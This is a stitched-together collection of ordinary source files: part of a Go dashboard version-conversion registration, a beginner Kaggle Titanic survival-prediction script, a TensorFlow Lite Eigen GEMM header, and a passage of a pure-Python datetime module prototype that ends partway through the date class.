			return Convert_V2alpha1_to_V2beta1(a.(*dashv2alpha1.Dashboard), b.(*dashv2beta1.Dashboard), scope)
		})); err != nil {
		return err
	}

	// v2beta1 conversions
	if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv0.Dashboard)(nil),
		withConversionMetrics(dashv2beta1.APIVERSION, dashv0.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V2beta1_to_V0(a.(*dashv2beta1.Dashboard), b.(*dashv0.Dashboard), scope, dsIndexProvider)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv1.Dashboard)(nil),
		withConversionMetrics(dashv2beta1.APIVERSION, dashv1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V2beta1_to_V1beta1(a.(*dashv2beta1.Dashboard), b.(*dashv1.Dashboard), scope, dsIndexProvider)
		})); err != nil {
		return err
	}
	if err := s.AddConversionFunc((*dashv2beta1.Dashboard)(nil), (*dashv2alpha1.Dashboard)(nil),
		withConversionMetrics(dashv2beta1.APIVERSION, dashv2alpha1.APIVERSION, func(a, b interface{}, scope conversion.Scope) error {
			return Convert_V2beta1_to_V2alpha1(a.(*dashv2beta1.Dashboard), b.(*dashv2alpha1.Dashboard), scope)
		})); err != nil {
		return err
	}

	return nil
}
""" This simple code is desinged to teach a basic user to read in the files in python, simply find what proportion of males and females survived and make a predictive model based on this
Author : AstroDave
Date : 18 September 2012
Revised: 28 March 2014
"""
import csv as csv
import numpy as np

# --- Training data ----------------------------------------------------------
csv_file_object = csv.reader(open('train.csv', 'rb'))  # Load in the csv file
header = csv_file_object.next()  # Skip the first line as it is a header
data=[]  # Create a variable to hold the data

for row in csv_file_object:  # Step through each row in the csv file,
    data.append(row[0:])  # adding each row to the data variable
data = np.array(data)  # Then convert from a list to an array.

# Now I have an array of 12 columns and 891 rows
# I can access any element I want, so the entire first column would
# be data[0::,0].astype(np.float) -- This means all of the rows (from start to end), in column 0
# I have to add the .astype() command, because
# when appending the rows, python thought it was a string - so needed to convert

# Set some variables (column 1 is 'Survived': 0 or 1 per passenger)
number_passengers = np.size(data[0::,1].astype(np.float))
number_survived = np.sum(data[0::,1].astype(np.float))
proportion_survivors = number_survived / number_passengers

# I can now find the stats of all the women on board,
# by making a boolean array that lists True/False whether each row is female
# (column 4 is 'Sex')
women_only_stats = data[0::,4] == "female"  # This finds where all the women are
men_only_stats = data[0::,4] != "female"  # This finds where all the men are (note != means 'not equal')

# I can now filter the whole data, to find statistics for just women, by just placing
# women_only_stats as a "mask" on my full data -- Use it in place of the '0::' part of the array index.
# You can test it by placing it there, and requesting column index [4], and the output should all read 'female'
# e.g. try typing this: data[women_only_stats,4]
women_onboard = data[women_only_stats,1].astype(np.float)
men_onboard = data[men_only_stats,1].astype(np.float)

# and derive some statistics about them
proportion_women_survived = np.sum(women_onboard) / np.size(women_onboard)
proportion_men_survived = np.sum(men_onboard) / np.size(men_onboard)

print 'Proportion of women who survived is %s' % proportion_women_survived
print 'Proportion of men who survived is %s' % proportion_men_survived

# Now that I have my indicator that women were much more likely to survive,
# I am done with the training set.
# Now I will read in the test file and write out my simplistic prediction:
# if female, then model that she survived (1)
# if male, then model that he did not survive (0)

# First, read in test.csv
test_file = open('test.csv', 'rb')
test_file_object = csv.reader(test_file)
header = test_file_object.next()

# Also open a new file so I can write to it. Call it something descriptive.
# Then loop through each row in the test file, and look in column index [3]
# (which is 'Sex' here, since test.csv has no 'Survived' column).
# Write out the PassengerId, and my prediction.
predictions_file = open("gendermodel.csv", "wb")
predictions_file_object = csv.writer(predictions_file)
predictions_file_object.writerow(["PassengerId", "Survived"])  # write the column headers
for row in test_file_object:  # For each row in test file,
    if row[3] == 'female':  # is it a female, if yes then
        predictions_file_object.writerow([row[0], "1"])  # write the PassengerId, and predict 1
    else:  # or else if male,
        predictions_file_object.writerow([row[0], "0"])  # write the PassengerId, and predict 0.
test_file.close()  # Close out the files.
predictions_file.close() | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_
#define TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_
#ifndef TFLITE_WITH_RUY
#include "tensorflow/lite/kernels/cpu_backend_context.h"
#include "tensorflow/lite/kernels/cpu_backend_gemm_params.h"
namespace tflite {
namespace cpu_backend_gemm {
namespace detail {
// Eigen-backed float GEMM used as the cpu_backend_gemm implementation when
// TFLite is built without Ruy (this whole header is compiled out when
// TFLITE_WITH_RUY is defined).
struct GemmImplUsingEigen {
  // Runs the float GEMM (declared here, defined in the corresponding .cc).
  // The MatrixParams describe each operand's layout and GemmParams carries
  // the remaining options for the <float, float> instantiation (both are
  // declared in cpu_backend_gemm_params.h).  The CpuBackendContext argument
  // exists for interface parity with other backends and is unused here, as
  // the commented-out parameter name indicates.
  static void Run(const MatrixParams<float>& lhs_params, const float* lhs_data,
                  const MatrixParams<float>& rhs_params, const float* rhs_data,
                  const MatrixParams<float>& dst_params, float* dst_data,
                  const GemmParams<float, float>& params,
                  CpuBackendContext* /* context */);
};
} // namespace detail
} // namespace cpu_backend_gemm
} // namespace tflite
#endif // not TFLITE_WITH_RUY
#endif // TENSORFLOW_LITE_KERNELS_CPU_BACKEND_GEMM_EIGEN_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/lite/kernels/cpu_backend_gemm_eigen.h |
"""Concrete date/time and related types -- prototype implemented in Python.
See http://www.zope.org/Members/fdrake/DateTimeWiki/FrontPage
See also http://dir.yahoo.com/Reference/calendars/
For a primer on DST, including many current DST rules, see
http://webexhibits.org/daylightsaving/
For more about DST than you ever wanted to know, see
ftp://elsie.nci.nih.gov/pub/
Sources for time zone and DST data: http://www.twinsun.com/tz/tz-link.htm
This was originally copied from the sandbox of the CPython CVS repository.
Thanks to Tim Peters for suggesting using it.
"""
# from __future__ import division
import time as _time
import math as _math
# import struct as _struct
import _struct
def divmod(x, y):
    """Integer-only replacement for the builtin divmod.

    Coerces both operands to int and returns (quotient, remainder) with the
    quotient floored, matching the builtin's behavior for integers.

    Uses // (floor division) rather than /: plain / on ints is floor
    division only under Python 2's classic division, and would silently
    produce a float quotient under true division.  // gives the identical
    result in both modes.
    """
    x, y = int(x), int(y)
    return x // y, x % y
_SENTINEL = object()
def _cmp(x, y):
return 0 if x == y else 1 if x > y else -1
def _round(x):
return int(_math.floor(x + 0.5) if x >= 0.0 else _math.ceil(x - 0.5))
# Supported year range (inclusive) for date/datetime values.
MINYEAR = 1
MAXYEAR = 9999
# Years before this cannot be formatted (enforced by the commented-out
# _wrap_strftime helper below).
_MINYEARFMT = 1900
# Maximum magnitude, in days, of a timedelta (enforced in timedelta._create).
_MAX_DELTA_DAYS = 999999999

# Utility functions, adapted from Python's Demo/classes/Dates.py, which
# also assumes the current Gregorian calendar indefinitely extended in
# both directions.  Difference:  Dates.py calls January 1 of year 0 day
# number 1.  The code here calls January 1 of year 1 day number 1.  This is
# to match the definition of the "proleptic Gregorian" calendar in Dershowitz
# and Reingold's "Calendrical Calculations", where it's the base calendar
# for all computations.  See the book for algorithms for converting between
# proleptic Gregorian ordinals and many other calendar systems.

# Index 0 is a -1 pad so month numbers 1..12 can index directly.
_DAYS_IN_MONTH = [-1, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]

# _DAYS_BEFORE_MONTH[m]: days preceding the first of month m in a
# non-leap year (running prefix sum of _DAYS_IN_MONTH).
_DAYS_BEFORE_MONTH = [-1]
dbm = 0
for dim in _DAYS_IN_MONTH[1:]:
    _DAYS_BEFORE_MONTH.append(dbm)
    dbm += dim
del dbm, dim
def _is_leap(year):
"year -> 1 if leap year, else 0."
return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)
def _days_before_year(year):
"year -> number of days before January 1st of year."
y = year - 1
return y*365 + y//4 - y//100 + y//400
def _days_in_month(year, month):
    "year, month -> number of days in that month in that year."
    assert 1 <= month <= 12, month
    if month != 2 or not _is_leap(year):
        return _DAYS_IN_MONTH[month]
    return 29  # February of a leap year
def _days_before_month(year, month):
    "year, month -> number of days in year preceding first day of month."
    assert 1 <= month <= 12, 'month must be in 1..12'
    # Past February of a leap year, every later month starts one day later.
    leap_shift = 1 if (month > 2 and _is_leap(year)) else 0
    return _DAYS_BEFORE_MONTH[month] + leap_shift
def _ymd2ord(year, month, day):
    "year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
    assert 1 <= month <= 12, 'month must be in 1..12'
    days_this_month = _days_in_month(year, month)
    assert 1 <= day <= days_this_month, ('day must be in 1..%d' % days_this_month)
    # Days in all prior years, plus days in prior months this year, plus day.
    return _days_before_year(year) + _days_before_month(year, month) + day
_DI400Y = _days_before_year(401)    # number of days in 400 years
_DI100Y = _days_before_year(101)    #    "    "   "   " 100   "
_DI4Y = _days_before_year(5)        #    "    "   "   "   4   "

# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1

# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1

# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1

# Microsecond conversion factors, one per timedelta constructor argument,
# used by _accum when totalling the arguments.
_US_PER_US = 1
_US_PER_MS = 1000
_US_PER_SECOND = 1000000
_US_PER_MINUTE = 60000000
_SECONDS_PER_DAY = 24 * 3600
_US_PER_HOUR = 3600000000
_US_PER_DAY = 86400000000
_US_PER_WEEK = 604800000000
def _ord2ymd(n):
    "ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
    # Inverse of _ymd2ord.

    # n is a 1-based index, starting at 1-Jan-1.  The pattern of leap years
    # repeats exactly every 400 years.  The basic strategy is to find the
    # closest 400-year boundary at or before n, then work with the offset
    # from that boundary to n.  Life is much clearer if we subtract 1 from
    # n first -- then the values of n at 400-year boundaries are exactly
    # those divisible by _DI400Y:
    #
    #     D  M   Y            n              n-1
    #     -- --- ----        ----------     ----------------
    #     31 Dec -400        -_DI400Y       -_DI400Y -1
    #      1 Jan -399        -_DI400Y +1    -_DI400Y      400-year boundary
    #     ...
    #     30 Dec  000        -1             -2
    #     31 Dec  000         0             -1
    #      1 Jan  001         1              0            400-year boundary
    #      2 Jan  001         2              1
    #      3 Jan  001         3              2
    #     ...
    #     31 Dec  400         _DI400Y        _DI400Y -1
    #      1 Jan  401         _DI400Y +1     _DI400Y      400-year boundary
    n -= 1
    n400, n = divmod(n, _DI400Y)
    year = n400 * 400 + 1   # ..., -399, 1, 401, ...

    # Now n is the (non-negative) offset, in days, from January 1 of year, to
    # the desired date.  Now compute how many 100-year cycles precede n.
    # Note that it's possible for n100 to equal 4!  In that case 4 full
    # 100-year cycles precede the desired day, which implies the desired
    # day is December 31 at the end of a 400-year cycle.
    n100, n = divmod(n, _DI100Y)

    # Now compute how many 4-year cycles precede it.
    n4, n = divmod(n, _DI4Y)

    # And now how many single years.  Again n1 can be 4, and again meaning
    # that the desired day is December 31 at the end of the 4-year cycle.
    n1, n = divmod(n, 365)

    year += n100 * 100 + n4 * 4 + n1
    if n1 == 4 or n100 == 4:
        assert n == 0
        return year-1, 12, 31

    # Now the year is correct, and n is the offset from January 1.  We find
    # the month via an estimate that's either exact or one too large.
    leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
    assert leapyear == _is_leap(year)
    month = (n + 50) >> 5
    preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
    if preceding > n:  # estimate is too large
        month -= 1
        preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
    n -= preceding
    assert 0 <= n < _days_in_month(year, month)

    # Now the year and month are correct, and n is the offset from the
    # start of that month:  we're done!
    return year, month, n+1
# Month and day names.  For localized versions, see the calendar module.
# Index 0 is a None pad so 1-based month/weekday numbers index directly.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
               "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]


def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
    # Assemble a time.struct_time.  wday is 0 for Monday (the +6 shifts
    # the ordinal so 01-Jan-0001, a Monday, maps to 0); dnum is the
    # 1-based day of the year.
    wday = (_ymd2ord(y, m, d) + 6) % 7
    dnum = _days_before_month(y, m) + d
    return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
# def _wrap_strftime(object, format, timetuple):
# year = timetuple[0]
# if year < _MINYEARFMT:
# raise ValueError("year=%d is before %d; the datetime strftime() "
# "methods require year >= %d" %
# (year, _MINYEARFMT, _MINYEARFMT))
# # Don't call utcoffset() or tzname() unless actually needed.
# freplace = None # the string to use for %f
# zreplace = None # the string to use for %z
# Zreplace = None # the string to use for %Z
# # Scan format for %z and %Z escapes, replacing as needed.
# newformat = []
# push = newformat.append
# i, n = 0, len(format)
# while i < n:
# ch = format[i]
# i += 1
# if ch == '%':
# if i < n:
# ch = format[i]
# i += 1
# if ch == 'f':
# if freplace is None:
# freplace = '%06d' % getattr(object,
# 'microsecond', 0)
# newformat.append(freplace)
# elif ch == 'z':
# if zreplace is None:
# zreplace = ""
# if hasattr(object, "_utcoffset"):
# offset = object._utcoffset()
# if offset is not None:
# sign = '+'
# if offset < 0:
# offset = -offset
# sign = '-'
# h, m = divmod(offset, 60)
# zreplace = '%c%02d%02d' % (sign, h, m)
# assert '%' not in zreplace
# newformat.append(zreplace)
# elif ch == 'Z':
# if Zreplace is None:
# Zreplace = ""
# if hasattr(object, "tzname"):
# s = object.tzname()
# if s is not None:
# # strftime is going to have at this: escape %
# Zreplace = s.replace('%', '%%')
# newformat.append(Zreplace)
# else:
# push('%')
# push(ch)
# else:
# push('%')
# else:
# push(ch)
# newformat = "".join(newformat)
# return _time.strftime(newformat, timetuple)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned.  Else ValueError is raised.
def _check_utc_offset(name, offset):
    assert name in ("utcoffset", "dst")
    if offset is None:
        return
    if not isinstance(offset, timedelta):
        raise TypeError("tzinfo.%s() must return None "
                        "or timedelta, not '%s'" % (name, type(offset)))
    days = offset.days
    if days < -1 or days > 0:
        # Magnitude of a day or more: substitute a value that is certain
        # to fail the -1440 < offset < 1440 range check below, so we fall
        # through to the single ValueError at the end.
        offset = 1440  # trigger out-of-range
    else:
        # days is -1 or 0 here, so `seconds` is the signed total offset.
        seconds = days * 86400 + offset.seconds
        minutes, seconds = divmod(seconds, 60)
        if seconds or offset.microseconds:
            # Sub-minute components are not representable as whole minutes.
            raise ValueError("tzinfo.%s() must return a whole number "
                             "of minutes" % name)
        offset = minutes
    if not -1440 < offset < 1440:
        raise ValueError("%s()=%d, must be in -1439..1439" % (name, offset))
    return offset
def _check_int_field(value):
    # Coerce `value` to a plain int for use as a date/time field.
    # - true ints pass straight through;
    # - floats are rejected outright (last raise below);
    # - any other type is given a chance via its __int__ method, but the
    #   result of __int__ must itself be an int (or Python 2 long).
    if isinstance(value, int):
        return int(value)
    if not isinstance(value, float):
        try:
            value = value.__int__()
        except AttributeError:
            # No __int__ at all: fall through to "an integer is required".
            pass
        else:
            if isinstance(value, int):
                return int(value)
            elif isinstance(value, long):
                # Python 2 long result: normalize through int().
                return int(long(value))
            raise TypeError('__int__ method should return an integer')
        raise TypeError('an integer is required')
    raise TypeError('integer argument expected, got float')
def _check_date_fields(year, month, day):
    """Coerce (year, month, day) to ints and validate calendar ranges.

    Returns the coerced triple; raises ValueError (carrying the offending
    value) when a field is out of range.
    """
    year, month, day = [_check_int_field(v) for v in (year, month, day)]
    if not MINYEAR <= year <= MAXYEAR:
        raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
    if not 1 <= month <= 12:
        raise ValueError('month must be in 1..12', month)
    month_days = _days_in_month(year, month)
    if not 1 <= day <= month_days:
        raise ValueError('day must be in 1..%d' % month_days, day)
    return year, month, day
def _check_time_fields(hour, minute, second, microsecond):
    """Coerce the four time components to ints and range-check them.

    Returns the coerced (hour, minute, second, microsecond) tuple; raises
    ValueError (carrying the offending value) for the first field out of
    range, checked in argument order.
    """
    hour = _check_int_field(hour)
    minute = _check_int_field(minute)
    second = _check_int_field(second)
    microsecond = _check_int_field(microsecond)
    limits = ((hour, 23, 'hour must be in 0..23'),
              (minute, 59, 'minute must be in 0..59'),
              (second, 59, 'second must be in 0..59'),
              (microsecond, 999999, 'microsecond must be in 0..999999'))
    for value, upper, message in limits:
        if not 0 <= value <= upper:
            raise ValueError(message, value)
    return hour, minute, second, microsecond
def _check_tzinfo_arg(tz):
    """Raise TypeError unless tz is None or a tzinfo instance."""
    if tz is None or isinstance(tz, tzinfo):
        return
    raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
# Notes on comparison: In general, datetime module comparison operators raise
# TypeError when they don't know how to do a comparison themself. If they
# returned NotImplemented instead, comparison could (silently) fall back to
# the default compare-objects-by-comparing-their-memory-addresses strategy,
# and that's not helpful. There are two exceptions:
#
# 1. For date and datetime, if the other object has a "timetuple" attr,
# NotImplemented is returned. This is a hook to allow other kinds of
# datetime-like objects a chance to intercept the comparison.
#
# 2. Else __eq__ and __ne__ return False and True, respectively. This is
#    so operations like
#
# x == y
# x != y
# x in sequence
# x not in sequence
# dict[x] = y
#
# don't raise annoying TypeErrors just because a datetime object
# is part of a heterogeneous collection. If there's no known way to
# compare X to a datetime, saying they're not equal is reasonable.
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
def _normalize_pair(hi, lo, factor):
if not 0 <= lo <= factor-1:
inc, lo = divmod(lo, factor)
hi += inc
return hi, lo
def _normalize_datetime(y, m, d, hh, mm, ss, us, ignore_overflow=False):
    # Normalize all the inputs, and store the normalized values.
    # Carries propagate one unit at a time, smallest first:
    # microseconds -> seconds -> minutes -> hours -> days, and finally the
    # date itself is normalized (which raises OverflowError for years
    # outside [MINYEAR, MAXYEAR] unless ignore_overflow is true).  The
    # order of these calls matters.
    ss, us = _normalize_pair(ss, us, 1000000)
    mm, ss = _normalize_pair(mm, ss, 60)
    hh, mm = _normalize_pair(hh, mm, 60)
    d, hh = _normalize_pair(d, hh, 24)
    y, m, d = _normalize_date(y, m, d, ignore_overflow)
    return y, m, d, hh, mm, ss, us
def _normalize_date(year, month, day, ignore_overflow=False):
    # Bring (year, month, day) into valid calendar range, carrying month
    # overflow into year and day overflow into month/year.

    # That was easy.  Now it gets muddy:  the proper range for day
    # can't be determined without knowing the correct month and year,
    # but if day is, e.g., plus or minus a million, the current month
    # and year values make no sense (and may also be out of bounds
    # themselves).
    # Saying 12 months == 1 year should be non-controversial.
    if not 1 <= month <= 12:
        # Normalize in 0-based month space, then shift back to 1-based.
        year, month = _normalize_pair(year, month-1, 12)
        month += 1
        assert 1 <= month <= 12

    # Now only day can be out of bounds (year may also be out of bounds
    # for a datetime object, but we don't care about that here).
    # If day is out of bounds, what to do is arguable, but at least the
    # method here is principled and explainable.
    dim = _days_in_month(year, month)
    if not 1 <= day <= dim:
        # Move day-1 days from the first of the month.  First try to
        # get off cheap if we're only one day out of range (adjustments
        # for timezone alone can't be worse than that).
        if day == 0:    # move back a day
            month -= 1
            if month > 0:
                day = _days_in_month(year, month)
            else:
                year, month, day = year-1, 12, 31
        elif day == dim + 1:    # move forward a day
            month += 1
            day = 1
            if month > 12:
                month = 1
                year += 1
        else:
            # General case: round-trip through the ordinal representation.
            ordinal = _ymd2ord(year, month, 1) + (day - 1)
            year, month, day = _ord2ymd(ordinal)

    if not ignore_overflow and not MINYEAR <= year <= MAXYEAR:
        raise OverflowError("date value out of range")
    return year, month, day
def _accum(tag, sofar, num, factor, leftover):
    # Add num*factor into the running total `sofar` (in microseconds).
    # ints/longs contribute exactly.  floats are split with math.modf:
    # the integral part goes into the total now, while the remaining
    # sub-microsecond fraction is accumulated in `leftover` so the caller
    # (timedelta.__new__) can round it in once at the end.
    # `tag` names the constructor argument for the error message.
    if isinstance(num, (int, long)):
        prod = num * factor
        rsum = sofar + prod
        return rsum, leftover
    if isinstance(num, float):
        fracpart, intpart = _math.modf(num)
        prod = int(intpart) * factor
        rsum = sofar + prod
        if fracpart == 0.0:
            return rsum, leftover
        # Scale the fractional part by the (integer) factor and split again.
        assert isinstance(factor, (int, long))
        fracpart, intpart = _math.modf(factor * fracpart)
        rsum += int(intpart)
        return rsum, leftover + fracpart
    raise TypeError("unsupported type for timedelta %s component: %s" %
                    (tag, type(num)))
class timedelta(object):
    """Represent the difference between two datetime objects.

    Supported operators:

    - add, subtract timedelta
    - unary plus, minus, abs
    - compare to timedelta
    - multiply, divide by int/long

    In addition, datetime supports subtraction of two datetime objects
    returning a timedelta, and addition or subtraction of a datetime
    and a timedelta giving a datetime.

    Representation: (days, seconds, microseconds).  Why?  Because I
    felt like it.
    """
    # _hashcode caches the hash; -1 means "not computed yet".
    __slots__ = '_days', '_seconds', '_microseconds', '_hashcode'

    def __new__(cls, days=_SENTINEL, seconds=_SENTINEL, microseconds=_SENTINEL,
                milliseconds=_SENTINEL, minutes=_SENTINEL, hours=_SENTINEL, weeks=_SENTINEL):
        # Accumulate every supplied argument into a single microsecond
        # count x.  Fractional microseconds from float arguments collect in
        # `leftover` and are rounded in once at the end (half away from
        # zero, via _round).  _SENTINEL distinguishes omitted arguments
        # from explicit zeros.
        x = 0
        leftover = 0.0
        if microseconds is not _SENTINEL:
            x, leftover = _accum("microseconds", x, microseconds, _US_PER_US, leftover)
        if milliseconds is not _SENTINEL:
            x, leftover = _accum("milliseconds", x, milliseconds, _US_PER_MS, leftover)
        if seconds is not _SENTINEL:
            x, leftover = _accum("seconds", x, seconds, _US_PER_SECOND, leftover)
        if minutes is not _SENTINEL:
            x, leftover = _accum("minutes", x, minutes, _US_PER_MINUTE, leftover)
        if hours is not _SENTINEL:
            x, leftover = _accum("hours", x, hours, _US_PER_HOUR, leftover)
        if days is not _SENTINEL:
            x, leftover = _accum("days", x, days, _US_PER_DAY, leftover)
        if weeks is not _SENTINEL:
            x, leftover = _accum("weeks", x, weeks, _US_PER_WEEK, leftover)
        if leftover != 0.0:
            x += _round(leftover)
        return cls._from_microseconds(x)

    @classmethod
    def _from_microseconds(cls, us):
        # Split a raw microsecond count into (days, seconds, microseconds).
        s, us = divmod(us, _US_PER_SECOND)
        d, s = divmod(s, _SECONDS_PER_DAY)
        return cls._create(d, s, us, False)

    @classmethod
    def _create(cls, d, s, us, normalize):
        # Internal constructor bypassing __new__'s argument accumulation.
        # normalize=True carries out-of-range us/s values upward first.
        if normalize:
            s, us = _normalize_pair(s, us, 1000000)
            d, s = _normalize_pair(d, s, 24*3600)

        if not -_MAX_DELTA_DAYS <= d <= _MAX_DELTA_DAYS:
            raise OverflowError("days=%d; must have magnitude <= %d" % (d, _MAX_DELTA_DAYS))

        self = object.__new__(cls)
        self._days = d
        self._seconds = s
        self._microseconds = us
        self._hashcode = -1
        return self

    def _to_microseconds(self):
        # Inverse of _from_microseconds: total duration as one integer.
        return ((self._days * _SECONDS_PER_DAY + self._seconds) * _US_PER_SECOND +
                self._microseconds)

    def __repr__(self):
        # Emit the shortest constructor call that reproduces this value,
        # omitting trailing zero components.
        module = "datetime." if self.__class__ is timedelta else ""
        if self._microseconds:
            return "%s(%d, %d, %d)" % (module + self.__class__.__name__,
                                       self._days,
                                       self._seconds,
                                       self._microseconds)
        if self._seconds:
            return "%s(%d, %d)" % (module + self.__class__.__name__,
                                   self._days,
                                   self._seconds)
        return "%s(%d)" % (module + self.__class__.__name__, self._days)

    def __str__(self):
        # Format as "[D day[s], ]H:MM:SS[.ffffff]".
        mm, ss = divmod(self._seconds, 60)
        hh, mm = divmod(mm, 60)
        s = "%d:%02d:%02d" % (hh, mm, ss)
        if self._days:
            def plural(n):
                return n, abs(n) != 1 and "s" or ""
            s = ("%d day%s, " % plural(self._days)) + s
        if self._microseconds:
            s = s + ".%06d" % self._microseconds
        return s

    def total_seconds(self):
        """Total seconds in the duration."""
        # return self._to_microseconds() / 10**6
        return float(self._to_microseconds()) / float(10**6)

    # Read-only field accessors
    @property
    def days(self):
        """days"""
        return self._days

    @property
    def seconds(self):
        """seconds"""
        return self._seconds

    @property
    def microseconds(self):
        """microseconds"""
        return self._microseconds

    def __add__(self, other):
        if isinstance(other, timedelta):
            # for CPython compatibility, we cannot use
            # our __class__ here, but need a real timedelta
            return timedelta._create(self._days + other._days,
                                     self._seconds + other._seconds,
                                     self._microseconds + other._microseconds,
                                     True)
        return NotImplemented

    def __sub__(self, other):
        if isinstance(other, timedelta):
            # for CPython compatibility, we cannot use
            # our __class__ here, but need a real timedelta
            return timedelta._create(self._days - other._days,
                                     self._seconds - other._seconds,
                                     self._microseconds - other._microseconds,
                                     True)
        return NotImplemented

    def __neg__(self):
        # for CPython compatibility, we cannot use
        # our __class__ here, but need a real timedelta
        return timedelta._create(-self._days,
                                 -self._seconds,
                                 -self._microseconds,
                                 True)

    def __pos__(self):
        # for CPython compatibility, we cannot use
        # our __class__ here, but need a real timedelta
        return timedelta._create(self._days,
                                 self._seconds,
                                 self._microseconds,
                                 False)

    def __abs__(self):
        # The normalized representation keeps 0 <= seconds/microseconds,
        # so the sign of the whole value is the sign of _days.
        if self._days < 0:
            return -self
        else:
            return self

    def __mul__(self, other):
        if not isinstance(other, (int, long)):
            return NotImplemented
        usec = self._to_microseconds()
        return timedelta._from_microseconds(usec * other)

    __rmul__ = __mul__

    def __div__(self, other):
        # Python 2 division protocol; only int/long divisors are supported.
        if not isinstance(other, (int, long)):
            return NotImplemented
        usec = self._to_microseconds()
        # return timedelta._from_microseconds(usec // other)
        return timedelta._from_microseconds(int(usec) / int(other))

    __floordiv__ = __div__

    # Comparisons of timedelta objects with other.
    # Non-timedelta operands: ==/!= answer False/True, ordering raises.

    def __eq__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) == 0
        else:
            return False

    def __ne__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) != 0
        else:
            return True

    def __le__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) <= 0
        else:
            _cmperror(self, other)

    def __lt__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) < 0
        else:
            _cmperror(self, other)

    def __ge__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) >= 0
        else:
            _cmperror(self, other)

    def __gt__(self, other):
        if isinstance(other, timedelta):
            return self._cmp(other) > 0
        else:
            _cmperror(self, other)

    def _cmp(self, other):
        # Lexicographic compare of the normalized (d, s, us) triples.
        assert isinstance(other, timedelta)
        return _cmp(self._getstate(), other._getstate())

    def __hash__(self):
        # Cached; -1 marks "not yet computed" (set in _create).
        if self._hashcode == -1:
            self._hashcode = hash(self._getstate())
        return self._hashcode

    def __nonzero__(self):
        # Python 2 truth protocol: true iff any component is nonzero.
        return (self._days != 0 or
                self._seconds != 0 or
                self._microseconds != 0)

    # Pickle support.

    def _getstate(self):
        return (self._days, self._seconds, self._microseconds)

    def __reduce__(self):
        return (self.__class__, self._getstate())
# Class attributes are assigned after the class statement because the
# values are themselves timedelta instances.
timedelta.min = timedelta(-_MAX_DELTA_DAYS)
timedelta.max = timedelta(_MAX_DELTA_DAYS, 24*3600-1, 1000000-1)
timedelta.resolution = timedelta(microseconds=1)
class date(object):
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__cmp__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day', '_hashcode'
    def __new__(cls, year, month=None, day=None):
        """Constructor.

        Arguments:

        year, month, day (required, base 1)
        """
        # if month is None and isinstance(year, bytes) and len(year) == 4 and \
        #                 1 <= ord(year[2]) <= 12:
        #     # Pickle support
        #     self = object.__new__(cls)
        #     self.__setstate(year)
        #     self._hashcode = -1
        #     return self
        # Validate/coerce the fields, then build the instance directly
        # (no __init__); -1 marks the cached hash as not yet computed.
        year, month, day = _check_date_fields(year, month, day)
        self = object.__new__(cls)
        self._year = year
        self._month = month
        self._day = day
        self._hashcode = -1
        return self
    # Additional constructors

    @classmethod
    def fromtimestamp(cls, t):
        "Construct a date from a POSIX timestamp (like time.time())."
        # Only the date components of the local-time conversion are used.
        y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
        return cls(y, m, d)

    @classmethod
    def today(cls):
        "Construct a date from time.time()."
        t = _time.time()
